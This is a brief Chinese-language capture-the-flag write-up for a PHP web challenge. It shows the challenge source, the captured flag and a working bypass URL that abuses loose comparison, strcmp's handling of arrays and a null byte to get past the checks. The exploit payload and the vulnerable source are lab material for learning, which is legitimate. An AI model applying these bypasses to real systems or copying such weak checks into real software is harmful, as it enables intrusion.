源码：

 <?php
show_source(__FILE__);
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['foo']);
if(is_array($a)){
    is_numeric(@$a["bar1"])?die("nope"):NULL;
    if(@$a["bar1"]){
        ($a["bar1"]>2017)?$v1=1:NULL;
    }
    if(is_array(@$a["bar2"])){
        if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
        $pos = array_search("hongya", $a["a2"]);
        $pos===false?die("nope"):NULL;
        foreach($a["bar2"] as $key=>$val){
            $val==="hongya"?die("nope"):NULL;
        }
        $v2=1;
    }
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
    if(!strcmp($c[1],$d) && $c[1]!==$d){
        eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
        strpos(($c[0].$d), "hongya2017")?$v3=1:NULL;
    }
}
if($v1 && $v2 && $v3){
    include "flag.php";
    echo $flag;
}
?>
Warning: strcmp() expects parameter 1 to be string, array given in /opt/lampp/htdocs/45/index.php on line 23
flag{e9f0c8f650be6119646732faf5a3cffc}



json_decode格式  foo={"bar1":"2019a","bar2":[[1],4,4,44,5],"a2":["hongya"]}

绕过脚本

http://10.2.0.37/45/index.php?foo={"bar1":"2019a","bar2":[[1],4,4,44,5],"a2":["hongya"]}&cat[0]=[%00hongya2017]&cat[1][]=5&dog=5